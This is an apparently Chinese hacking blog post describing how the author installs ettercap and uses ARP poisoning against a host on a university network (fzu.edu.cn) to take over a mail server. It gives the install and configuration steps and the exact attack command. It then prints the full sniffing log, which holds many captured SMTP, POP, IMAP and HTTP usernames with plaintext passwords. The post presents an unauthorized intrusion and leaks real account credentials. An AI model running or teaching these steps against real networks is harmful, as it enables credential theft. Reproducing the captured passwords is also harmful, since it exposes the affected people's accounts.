本来懒得学习ETTERCAP的。
可是为了拿下一个邮件服务器,扫描了下C段。。
<ignore_js_op>
这样就没办法了
不过有一个TELNET的密码在我强大的字典里。。
百度了下,多是安装和原理介绍。。
不就是把帮助文档翻译了下嘛。。。
硬着头皮琢磨了几天,终于达到预期的目的
分享出来希望有相同要求的可以少走弯路
1,准备
需要安装的有
libnet-1.1.2.1.tar.gz
libpcap-1.2.1.tar.gz
ettercap-NG-0.7.3.tar.gz
说下快速安装的办法,
直接把文件名交给google
然后在linux下用wget下载
整个过程10分钟内基本完成
然后
tar zxvf libnet-1.1.2.1.tar.gz
cd libnet
./configure
make
make install
经典三部曲
然后回到命令行下
输入ettercap -help
确认安装好平【顺便稍稍看下帮助吧】
locate etter.conf
查找配置文件
找到配置文件的位置
nano /usr/local/etc/etter.conf
找到以下位置并做如下修改(有的不是必须的,但喜欢这样做。。。因为方便):
<ignore_js_op>
<ignore_js_op>
改完后按CTRL+X,然后按Y,最后一下回车
改完后回到命令行输入
sysctl -w net.ipv4.ip_forward=1
这样可以使主机转发收到的但目标地址不是本机的数据包
准备工作做好了
输入
ettercap -i eth0 -l /tmp/0304l -m /tmp/0304m -T -q -M ARP /192.168.2.3/ //
监听etho0网卡,嗅探192.168.2.3,然后将loginfo保存到0304l将消息文件保存到0304m
Listening on eth0... (Ethernet) eth0 -> 3C:D9:2B:FE:97:72 192.168.48.1 255.255.255.192Privileges dropped to UID 0 GID 0... 0 plugins (disabled by configure...) 39 protocol dissectors 54 ports monitored7587 mac vendor fingerprint1766 tcp OS fingerprint2183 known servicesRandomizing 63 hosts for scanning...Scanning the whole netmask for 63 hosts...9 hosts added to the hosts list...ARP poisoning victims: GROUP 1 : 192.168.48.13 00:03:BA:38:A6:C4 GROUP 2 : ANY (all the hosts in the list)Starting Unified sniffing...Text only Interface activated...Hit 'h' for inline helpSMTP : 192.168.48.13:25 -> USER: zby@fzu.edu.cn PASS: 123456SEND L3 ERROR: 2960 byte packet (0800:06) destined to 192.168.58.60 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang@fzu.edu.cn PASS: 12345678SMTP : 192.168.48.13:25 -> USER: dptang@fzu.edu.cn PASS: adminSMTP : 192.168.48.13:25 -> USER: dptang PASS: dptangSMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang111111SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang666666SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang888888POP : 192.168.48.13:110 -> USER: dzli PASS: dzli@3721SEND L3 ERROR: 1833 byte packet (0800:06) destined to 172.23.110.102 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptangabcSEND L3 ERROR: 1541 byte packet (0800:06) destined to 125.77.120.130 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang123SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang111SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang666SEND L3 ERROR: 2960 byte packet (0800:06) destined to 218.193.125.74 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang888SEND L3 ERROR: 2960 byte packet (0800:06) destined to 192.168.58.60 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: dptang123456SMTP : 192.168.48.13:25 -> USER: dptang PASS: abc123HTTP : 192.168.48.13:80 -> USER: hmd PASS: hmd4912 INFO: http://fzu.edu.cn/coremail/index.jspSMTP : 192.168.48.13:25 -> USER: dptang PASS: abd123SMTP : 192.168.48.13:25 -> USER: dptang PASS: abc321SEND L3 ERROR: 1541 byte packet (0800:06) destined to 59.77.130.22 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: abd321SEND L3 ERROR: 1541 byte packet (0800:06) destined to 121.204.25.33 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 4420 byte packet (0800:06) destined to 192.168.58.60 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 123456SEND L3 ERROR: 2960 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 3852 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2960 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2960 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2960 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))POP : 192.168.48.13:110 -> USER: xiaogr PASS: gr720613SEND L3 ERROR: 1541 byte packet (0800:06) destined to 220.180.140.82 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 4180 byte packet (0800:06) destined to 123.125.71.26 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 123123SEND L3 ERROR: 2756 byte packet (0800:06) destined to 192.168.48.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2800 byte packet (0800:06) destined to 192.168.48.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 000000SEND L3 ERROR: 4420 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 3852 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2960 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 5312 byte packet (0800:06) destined to 219.229.136.222 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 111111SMTP : 192.168.48.13:25 -> USER: zby@fzu.edu.cn PASS: 888888SEND L3 ERROR: 2960 byte packet (0800:06) destined to 192.168.58.60 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 666666SEND L3 ERROR: 2800 byte packet (0800:06) destined to 123.125.71.26 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 888888SEND L3 ERROR: 4420 byte packet (0800:06) destined to 218.193.125.74 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2960 byte packet (0800:06) destined to 218.193.125.74 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 999999SEND L3 ERROR: 3778 byte packet (0800:06) destined to 192.168.48.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SEND L3 ERROR: 2410 byte packet (0800:06) destined to 192.168.48.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang PASS: 1234567IMAP : 192.168.48.13:143 -> USER: luqm PASS: 830502lqmSMTP : 192.168.48.13:25 -> USER: dptang PASS: 12345678SMTP : 192.168.48.13:25 -> USER: dptang PASS: adminSEND L3 ERROR: 4347 byte packet (0800:06) destined to 192.168.48.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long))SMTP : 192.168.48.13:25 -> USER: dptang@fzu.edu.cn PASS: dptangClosing text interface...ARP poisoner deactivated.RE-ARPing the victims...Unified sniffing was stopped.
监听效果如下。。
很不幸,这个时候有人在字典破解。。。
声明: 本文采用 CC BY-NC-SA 3.0 协议进行授权转载请注明来源:Panni Security Team本文链接地址:http://www.panni007.com/2013/03/13/794.html 所有的赏赐都只是被用来奖励工作成果的。